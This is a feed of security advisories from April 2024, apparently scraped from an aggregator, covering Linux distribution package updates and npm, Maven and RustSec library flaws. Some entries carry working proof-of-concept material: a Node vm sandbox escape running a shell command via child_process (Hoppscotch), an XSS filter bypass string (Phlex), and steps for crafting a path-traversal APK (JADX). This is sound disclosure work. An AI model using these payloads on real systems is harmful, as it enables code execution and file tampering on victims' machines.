https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HGXW-5XG3-69JX
19.04.2024 22:45:28	slackware	[SSA:2024-110-01] freerdp	New freerdp packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/freerdp-2.11.6-i586-1_slack15.0.txz: Upgraded. This release is a security release and addresses multiple issues: [Low] OutOfBound Read in zgfx_decompress_segment. [Moderate] Integer overflow & OutOfBound Write in clear_decompress_residual_data. [Low] integer underflow in nsc_rle_decode. [Low] OutOfBound Read in planar_skip_plane_rle. [Low] OutOfBound Read in ncrush_decompress. [Low] OutOfBound Read in interleaved_decompress. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-32041 https://www.cve.org/CVERecord?id=CVE-2024-32039 https://www.cve.org/CVERecord?id=CVE-2024-32040 https://www.cve.org/CVERecord?id=CVE-2024-32458 https://www.cve.org/CVERecord?id=CVE-2024-32459 https://www.cve.org/CVERecord?id=CVE-2024-32460 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/freerdp-2.11.6-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/freerdp-2.11.6-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/freerdp-2.11.6-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/freerdp-2.11.6-x86_64-1.txzMD5 signaturesSlackware 15.0 package:e1047f9cca0b0c882206445baa5a7ae5 freerdp-2.11.6-i586-1_slack15.0.txzSlackware x86_64 15.0 package:1411705cbf21668ba56e322619956a69 freerdp-2.11.6-x86_64-1_slack15.0.txzSlackware -current package:6659989e410814dca9b57162f7c83622 xap/freerdp-2.11.6-i586-1.txzSlackware x86_64 -current package:d6ea7c0d6e7880964bbde2b6cec26f6e xap/freerdp-2.11.6-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg freerdp-2.11.6-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-110-01
19.04.2024 20:26:37	npm	[NPM:GHSA-23Q2-5GF8-GJPP] Enabling Authentication does not close all logged in socket connections immediately (low)	### SummaryThis is basically [GHSA-88j4-pcx8-q4q](https://github.com/louislam/uptime-kuma/security/advisories/GHSA-88j4-pcx8-q4q3) but instead of changing passwords, when enabling authentication.### PoC- Open Uptime Kuma with authentication disabled- Enable authentication using another window- Access the platform using the previously logged-in window- Note that access (read-write) remains despite the enabled authentication- Expected behaviour: - After enabling authentication, all previously connected sessions should be invalidated, requiring users to log in.- Actual behaviour: - The system retains sessions and never logs out users unless explicitly done by clicking logout or refreshing the page.### ImpactSee [GHSA-g9v2-wqcj-j99g](https://github.com/louislam/uptime-kuma/security/advisories/GHSA-g9v2-wqcj-j99g) and [GHSA-88j4-pcx8-q4q](https://github.com/louislam/uptime-kuma/security/advisories/GHSA-88j4-pcx8-q4q3)TBH this is quite a niche edge case, so I don't know if this even warrants a security report.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-23Q2-5GF8-GJPP
19.04.2024 17:04:04	ubuntu	[USN-6743-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6743-1
19.04.2024 16:51:13	ubuntu	[USN-6742-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6742-1
19.04.2024 16:42:12	ubuntu	[USN-6741-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6741-1
19.04.2024 16:32:30	ubuntu	[USN-6740-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6740-1
19.04.2024 16:23:13	ubuntu	[USN-6739-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6739-1
19.04.2024 03:00:00	debian	[DSA-5666-1] flatpak (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5666-1
19.04.2024 03:00:00	debian	[DSA-5667-1] tomcat9 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5667-1
19.04.2024 03:00:00	oraclelinux	[ELSA-2024-1908] firefox security update (important)	[115.10.0-1.0.1]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.10.0-1]- Update to 115.10.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1908
19.04.2024 03:00:00	oraclelinux	[ELSA-2024-1912] firefox security update (important)	[115.10.0-1.0.1]- Change default prefs file to Oracle version[115.10.0-1]- Update to 115.10.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1912
19.04.2024 03:00:00	oraclelinux	[ELSA-2024-1825] java-17-openjdk security update (moderate)	[17.0.11.0.9-2.0.1]- Add Oracle vendor bug URL[1:17.0.11.0.9-2]- Update to jdk-17.0.11+9 (GA)- Add openjdk-17.0.11+9.tar.xz to .gitignore- Sync java-17-openjdk-portable.specfile from openjdk-portable-rhel-8- Update buildver from 7 to 9- Update portablerelease from 1 to 3- Change is_ga from 0 to 1 to enable GA mode for release- Update tzdata Requires comment to mention that 2024a is not yet in the buildroot- Update tzdata BuildRequires comment to mention that 2024a is not yet in the buildroot- Update tzdata BuildRequires from 2023c to 2023d- Update sources from openjdk-17.0.11+7-ea.tar.xz to openjdk-17.0.11+9.tar.xz- Resolves: RHEL-30939- This tarball is embargoed until 2024-04-16 @ 1pm PT. [1:17.0.11.0.7-0.2.ea]- Update to jdk-17.0.11+7 (EA)- Update buildjdkver to match the featurever- Use featurever macro to specify fips patch- Explain patchN syntax situation in a comment- Sync generate_source_tarball.sh- Require tzdata 2023d (JDK-8322725)- openjdk_news.sh: Use grep -E instead of egrep- Remove RH1649512 patch for libjpeg-turbo FAR macro- Move pcsc-lite-libs patch to in-need-of-upstreaming section- Related: RHEL-30939	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1825
19.04.2024 18:40:04	rustsec	[RUSTSEC-2024-0336] `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input	If a `close_notify` alert is received during a handshake, `complete_io`does not terminate.Callers which do not call `complete_io` are not affected.`rustls-tokio` and `rustls-ffi` do not call `complete_io`and are not affected.`rustls::Stream` and `rustls::StreamOwned` types use`complete_io` and are affected.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0336
18.04.2024 22:23:18	slackware	[SSA:2024-109-01] glibc	New glibc packages are available for Slackware 15.0 and -current to fixa security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/aaa_glibc-solibs-2.33-i586-6_slack15.0.txz: Rebuilt.patches/packages/glibc-2.33-i586-6_slack15.0.txz: Rebuilt. This update fixes a security issue: The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-2961 (* Security fix )patches/packages/glibc-i18n-2.33-i586-6_slack15.0.txz: Rebuilt.patches/packages/glibc-profile-2.33-i586-6_slack15.0.txz: Rebuilt.```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/aaa_glibc-solibs-2.33-i586-6_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-2.33-i586-6_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-i18n-2.33-i586-6_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-profile-2.33-i586-6_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/aaa_glibc-solibs-2.33-x86_64-6_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-2.33-x86_64-6_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-i18n-2.33-x86_64-6_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-profile-2.33-x86_64-6_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/aaa_glibc-solibs-2.39-i586-2.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.39-i586-2.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.39-i586-2.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.39-i586-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/aaa_glibc-solibs-2.39-x86_64-2.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.39-x86_64-2.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.39-x86_64-2.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.39-x86_64-2.txzMD5 signaturesSlackware 15.0 package:db1fdb65d9e64639b11f35a0b6b150b7 aaa_glibc-solibs-2.33-i586-6_slack15.0.txzac723131a3e18c7220bff020d4597bf8 glibc-2.33-i586-6_slack15.0.txzf3b70a54eb163e043c4c5f6a67e9d0e9 glibc-i18n-2.33-i586-6_slack15.0.txz6b98c77321151022d17312825436be7f glibc-profile-2.33-i586-6_slack15.0.txzSlackware x86_64 15.0 package:b2476b8368bef6a3ef0eaca4eb8d3db6 aaa_glibc-solibs-2.33-x86_64-6_slack15.0.txze36a2bd9e8c8ea38fd64df24baf61e36 glibc-2.33-x86_64-6_slack15.0.txz9e7970f2775d7127ac618296c0884109 glibc-i18n-2.33-x86_64-6_slack15.0.txzeb39636b73e2fd695ab8cf8850050889 glibc-profile-2.33-x86_64-6_slack15.0.txzSlackware -current package:eac98c14f059ea434e655ec6c3e35afd a/aaa_glibc-solibs-2.39-i586-2.txz7bd0e24e064cabdad278b1baf8c380e2 l/glibc-2.39-i586-2.txz7e280ef1dfff11b34adf258c6e8301b3 l/glibc-i18n-2.39-i586-2.txzca5fb64de16d846cd1ef6bf845c50cc3 l/glibc-profile-2.39-i586-2.txzSlackware x86_64 -current package:86d02cbc3ce60f1ba2e31e334ad8f84f a/aaa_glibc-solibs-2.39-x86_64-2.txz032540c006e8015368d71fb98f6a1bc0 l/glibc-2.39-x86_64-2.txzd5a77e36486fcf60c8fb89f45635d752 l/glibc-i18n-2.39-x86_64-2.txzcaba19659a85eb38cc0e8692f4d89efa l/glibc-profile-2.39-x86_64-2.txzInstallation instructionsUpgrade the package as root:`# upgradepkg glibc-*.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-109-01
18.04.2024 20:15:53	suse	[SUSE-SU-2024:1345-1] Security update for tomcat (important)	Security update for tomcat	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1345-1
18.04.2024 19:58:18	npm	[NPM:GHSA-JJFF-Q3Q4-5HH8] @andrei-tatar/nora-firebase-common Prototype Pollution vulnerability (high)	An issue inandrei-tatar nora-firebase-common between v.1.0.41 and v.1.12.2 allows a remote attacker to execute arbitrary code via a crafted script to the updateState parameter of the updateStateInternal method.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JJFF-Q3Q4-5HH8
18.04.2024 16:04:08	suse	[SUSE-SU-2024:1340-1] Security update for pgadmin4 (important)	Security update for pgadmin4	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1340-1
18.04.2024 14:58:27	ubuntu	[USN-6737-1] GNU C Library vulnerability	GNU C Library could be made to crash or run programs if it processedspecially crafted data.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6737-1
18.04.2024 13:27:13	almalinux	[ALSA-2024:1879] gnutls security update (moderate)	gnutls security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1879
18.04.2024 13:28:16	almalinux	[ALSA-2024:1872] mod_http2 security update (important)	mod_http2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1872
19.04.2024 16:03:54	almalinux	[ALSA-2024:1818] java-1.8.0-openjdk security update (moderate)	java-1.8.0-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1818
18.04.2024 16:46:24	almalinux	[ALSA-2024:1825] java-17-openjdk security update (moderate)	java-17-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1825
19.04.2024 22:24:09	rubysec	[RUBYSEC:PHLEX-2024-32463] Cross-site Scripting (XSS) possible due to improper sanitisation of `href` attributes on `` tags (high)	### SummaryThere is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data.Our filter to detect and prevent the use of the `javascript:` URL scheme in the `href` attribute of an `<a>` tag could be bypassed with tab `\t` or newline `\n` characters between the characters of the protocol, e.g. `java\tscript:`.### ImpactIf you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.```rubya(href: user_profile) { "Profile" }```### MitigationThe best way to mitigate this vulnerability is to update to one of the following versions:- [1.10.1](https://rubygems.org/gems/phlex/versions/1.10.1)- [1.9.2](https://rubygems.org/gems/phlex/versions/1.9.2)- [1.8.3](https://rubygems.org/gems/phlex/versions/1.8.3)- [1.7.2](https://rubygems.org/gems/phlex/versions/1.7.2)- [1.6.3](https://rubygems.org/gems/phlex/versions/1.6.3)- [1.5.3](https://rubygems.org/gems/phlex/versions/1.5.3)- [1.4.2](https://rubygems.org/gems/phlex/versions/1.4.2)### WorkaroundsConfiguring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-2024-32463
18.04.2024 11:41:52	composer	[PHP:TIMBER-TIMBER-2024-29800] Deserialization of Untrusted Data in timber/timber		https://secdb.nttzen.cloud/security-advisory/composer/PHP:TIMBER-TIMBER-2024-29800
20.04.2024 03:00:00	debian	[DSA-5668-1] chromium (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5668-1
20.04.2024 05:21:14	rustsec	[RUSTSEC-2024-0336] `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input (high)	If a `close_notify` alert is received during a handshake, `complete_io`does not terminate.Callers which do not call `complete_io` are not affected.`rustls-tokio` and `rustls-ffi` do not call `complete_io`and are not affected.`rustls::Stream` and `rustls::StreamOwned` types use`complete_io` and are affected.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0336
22.04.2024 22:44:32	slackware	[SSA:2024-113-01] freerdp	New freerdp packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/freerdp-2.11.7-i586-1_slack15.0.txz: Upgraded. This release eliminates a bunch of issues detected during oss-fuzz runs. (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/freerdp-2.11.7-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/freerdp-2.11.7-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/freerdp-2.11.7-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/freerdp-2.11.7-x86_64-1.txzMD5 signaturesSlackware 15.0 package:a0177def144b59c5fb50bcf16c7057a1 freerdp-2.11.7-i586-1_slack15.0.txzSlackware x86_64 15.0 package:cdaaa114d71ccba1781a5013c1652333 freerdp-2.11.7-x86_64-1_slack15.0.txzSlackware -current package:655ffad59655b5132d847929537bfe5a xap/freerdp-2.11.7-i586-1.txzSlackware x86_64 -current package:491dbe29629ec598cf46cce0b85d99e7 xap/freerdp-2.11.7-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg freerdp-2.11.7-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-113-01
22.04.2024 21:38:14	npm	[NPM:GHSA-QMMM-73R2-F8XR] @hoppscotch/cli affected by Sandbox Escape in @hoppscotch/js-sandbox leads to RCE (high)	### ObservationsThe Hoppscotch desktop app takes multiple precautions to be secure against arbitrary JavaScript and system command execution. It does not render user-controlled HTML or Markdown, uses Tauri instead of Electron, and sandboxes pre-request scripts with a simple yet secure implementation using web workers.Unfortunately, web workers are not available in a pure Node.js application like Hoppscotch CLI. That is why the [@hoppscotch/js-sandbox](https://github.com/hoppscotch/hoppscotch/tree/main/packages/hoppscotch-js-sandbox) package also provides a Javascript sandbox that uses the Node.js `vm` module. However, the `vm` module is not safe for sandboxing untrusted Javascript code, as stated [in the documentation](https://nodejs.org/api/vm.html#vm-executing-javascript). This is because [code inside the vm context can break out](https://thegoodhacker.com/posts/the-unsecure-node-vm-module/) if it can get a hold of any reference to an object created outside of the vm.In the case of @hoppscotch/js-sandbox, multiple references to external objects are passed into the vm context to allow pre-request scripts interactions with environment variables and more. But this also allows the pre-request script to escape the sandbox.[packages/hoppscotch-js-sandbox/src/pre-request/node-vm/index.ts](https://github.com/hoppscotch/hoppscotch/blob/faab1d20fde9a6be660db40fc73dcf28f9038008/packages/hoppscotch-js-sandbox/src/pre-request/node-vm/index.ts#L23-L31)```jsconst { pw, updatedEnvs } = getPreRequestScriptMethods(envs)// Expose pw to the contextcontext.pw = pwcontext.atob = atobcontext.btoa = btoa// Run the pre-request script in the provided contextrunInContext(preRequestScript, context)```### ExploitationAn attacker can use the exposed `pw` object reference to escape the sandbox and execute arbitrary system commands using the `child_process` Node.js module. This PoC pre-request script executes the `id > /tmp/pwnd` system command as soon as a request is sent.```jsoutside = pw.constructor.constructor('return this')()outside.process.mainModule.require('child_process').execSync('id > /tmp/pwnd')```An attacker who wants to run arbitrary code on the machine of a victim can create a Hoppscotch collection containing a request with a malicious pre-request script and share it with a victim, using the JSON export feature. The victim then has to run the collection with the Hoppscotch CLI. Then the malicious pre-request script executes.### ImpactThis attack gives an attacker arbitrary command execution on the machine of a victim Hoppscotch CLI user. For the attack to succeed, an attacker has to lure the victim into downloading a malicious Hoppscotch collection and running it with the Hoppscotch CLI.This issue does not impact Hoppscotch Web or Desktop, as they use the safe web worker sandboxing approach.### RecommendationsHoppscotch CLI and other tools that rely on @hoppscotch/js-sandbox but don't have access to a browser cannot use the web worker sandbox. For these, you can look into other safe JavaScript sandboxing libraries. We think that [isolated-vm](https://github.com/laverdet/isolated-vm) looks promising. We discourage the use of [vm2](https://github.com/patriksimek/vm2), which is deprecated because it has arbitrary bypasses. Alternatively, you can introduce an `--enable-scripting` flag for the CLI and disable scripting by default. Or you can change the threat model and educate users that they should not run untrusted collections as it can lead to RCE.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QMMM-73R2-F8XR
22.04.2024 20:40:26	ubuntu	[USN-6743-2] Linux kernel (Low Latency) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6743-2
22.04.2024 18:56:06	maven	[MAVEN:GHSA-HVP5-5X4F-33FQ] JADX file override vulnerability (low)	### Summarywhen jadx parses a resource file, there is an escape problem with the style file, which can overwrite other files in the directory when saving the decompile result.Although I don't think this vulnerability realizes path traversal in the true sense of the word , I reported it anyway### DetailsI see that getResAlias does something with the filename.```javaprivate String getResAlias(int resRef, String origKeyName, @Nullable FieldNode constField) {```but type style will return the original filename directly.![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232212491.jpeg)so our goal is to take a malicious file that was originally of type raw, modify its type to style, trick jadx into#### step1create an android project using androidstudio and create a raw folder with the name attack_file_sayhiiiiiiiiiiiii, it doesn't matter what the content is!![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232212073.jpg)generate an initial APK#### step2 extract this initial APK using ZIP software to get resources.arsc![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232212841.jpg)drop resources.arsc into 010editor#### step3search for the previous filename attack_file_sayhiiiiiiiiiiiii , two will appear here, we choose the second one![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213527.jpg)let's change the name of the file here. I'll change it to ../../_file_sayhiiiiiiiiiiiiinote that you can only overwrite files in the folder where the decompile was saved.![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213343.jpg)#### step4 change the type of this file to style![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213183.jpg)modified to 0E![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213484.jpg)#### step5 After saving, re-compress the whole folder into a zip, then change the extension to APK.open it with JADX and you can see that it has been changed to a style type.![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213864.jpg)click save all![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213119.jpg)you can see the file escaping.![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213746.jpg)so we can also construct a ![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213497.jpg)so the classes.dex file is also replaced here![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213075.jpg)### PoCthe details above have been written### Impactlatest version	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HVP5-5X4F-33FQ
22.04.2024 18:52:01	maven	[MAVEN:GHSA-QWHW-HH9J-54F5] Ant Media Server vulnerable to a local privilege escalation (high)	### ImpactWe have identified a local privilege escalation vulnerability in Ant Media Server which allows any unprivileged operating system user account to escalate privileges to the root user account on the system. This vulnerability arises from Ant Media Server running with Java Management Extensions (JMX) enabled and authentication disabled on localhost on port 5599/TCP. This vulnerability is nearly identical to the local privilege escalation vulnerability CVE-2023-26269 identified in Apache James.Any unprivileged operating system user can connect to the JMX service running on port 5599/TCP on localhost and leverage the MLet Bean within JMX to load a remote MBean from an attacker-controlled server. This allows an attacker to execute arbitrary code within the Java process run by Ant Media Server and execute code within the context of the “antmedia” service account on the system.### Patches2.9.0### WorkaroundsRemote the following parameters from antmedia.service file```-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=5599 -Dcom.sun.management.jmxremote.local.only=true -Dcom.sun.management.jmxremote.host=127.0.0.1 -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useLocalHostname=true -Dcom.sun.management.jmxremote.rmi.port=5599```Thank you [Adam Crosser](https://www.linkedin.com/in/adam-crosser-366263265/) for reporting the issue[Local Privilege Escalation via Unauthenticated JMX Remote Management Interface (1).pdf](https://github.com/ant-media/Ant-Media-Server/files/15059667/Local.Privilege.Escalation.via.Unauthenticated.JMX.Remote.Management.Interface.1.pdf)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QWHW-HH9J-54F5
22.04.2024 21:37:59	maven	[MAVEN:GHSA-6MGP-P75R-VHJM] Apache HugeGraph-Server: Bypass whitelist in Auth mode (high)	Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0.Users are recommended to upgrade to version 1.3.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6MGP-P75R-VHJM
22.04.2024 21:37:54	maven	[MAVEN:GHSA-29RC-VQ7F-X335] Apache HugeGraph-Server: Command execution in gremlin (critical)	RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-29RC-VQ7F-X335
22.04.2024 21:37:46	maven	[MAVEN:GHSA-77X4-55Q7-4VMJ] Apache HugeGraph-Hubble: SSRF in Hubble connection page (high)	Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble. This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.Users are recommended to upgrade to version 1.3.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-77X4-55Q7-4VMJ
22.04.2024 16:46:57	ubuntu	[USN-6744-2] Pillow vulnerability (medium)	Pillow could be made to crash or run programs as an administratorif it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6744-2
22.04.2024 14:12:02	ubuntu	[USN-6745-1] Percona XtraBackup vulnerability (high)	percona-xtrabackup could be made to run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6745-1
22.04.2024 12:47:43	ubuntu	[USN-6738-1] LXD vulnerability (medium)	LXD could be made to bypass integrity checks if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6738-1
22.04.2024 12:25:43	ubuntu	[USN-6744-1] Pillow vulnerability (medium)	Pillow could be made to crash or run programs as an administratorif it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6744-1
22.04.2024 03:00:00	debian	[DSA-5669-1] guix (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5669-1
22.04.2024 03:00:00	debian	[DSA-5670-1] thunderbird	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5670-1
22.04.2024 03:00:00	debian	[DSA-5671-1] openjdk-11 (low)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5671-1
22.04.2024 03:00:00	debian	[DSA-5672-1] openjdk-17 (low)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5672-1
22.04.2024 03:00:00	oraclelinux	[ELSA-2024-1831] kernel security update (important)	[2.6.32-754.53.1.OL6]- net/sched: sch_qfq: refactor parsing of netlink parameters [Orabug: 36517546]- net/sched: sch_qfq: account for stab overhead in qfq_enqueue {CVE-2023-3611} [Orabug: 36517546]- net/sched: cls_fw: Fix improper refcount update leads to use-after-free {CVE-2023-3776} [Orabug: 36517546]- net: sched: sch_qfq: Fix UAF in qfq_dequeue() {CVE-2023-4921} [Orabug: 36517546]- net: sched: sch_qfq: prevent slab-out-of-bounds in qfq_activate_agg {CVE-2023-31436} [Orabug: 36517546]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1831
22.04.2024 03:00:00	oraclelinux	[ELSA-2024-1935] thunderbird security update (low)	[115.10.0-2.0.1]- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js- Enabled aarch64 build[115.10.0-2]- Update to 115.10.0 build2[115.10.0-1]- Update to 115.10.0 build1- Revert expat CVE-2023-52425 fix	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1935
22.04.2024 03:00:00	oraclelinux	[ELSA-2024-1939] thunderbird security update (low)	[115.10.0-2.0.1]- Add Oracle prefs[115.10.0]- Add OpenELA debranding[115.10.0-2]- Update to 115.10.0 build2[115.10.0-1]- Update to 115.10.0 build1- Revert expat CVE-2023-52425 fix	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1939
22.04.2024 03:00:00	oraclelinux	[ELSA-2024-1821] java-11-openjdk security update (moderate)	[1:11.0.23.0.9-2.0.1]- link atomic for ix86 build[1:11.0.23.0.9-2]- Fix 11.0.22 release date in NEWS- Restore ppc64le --with-jobs=1 workaround to avoid flaky ppc builds[1:11.0.23.0.9-1]- Update to jdk-11.0.23+9 (GA)- Update release notes to 11.0.23+9- Switch to GA mode for release- Require tzdata 2024a due to upstream inclusion of JDK-8322725- Only require tzdata 2023d for now as 2024a is unavailable in buildroot- This tarball is embargoed until 2024-04-16 @ 1pm PT. - Resolves: RHEL-30914[1:11.0.23.0.1-0.1.ea]- Update to jdk-11.0.23+1 (EA)- Update release notes to 11.0.23+1- Switch to EA mode- Speed up PPC build by removing ppc64le --with-jobs=1 workaround	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1821
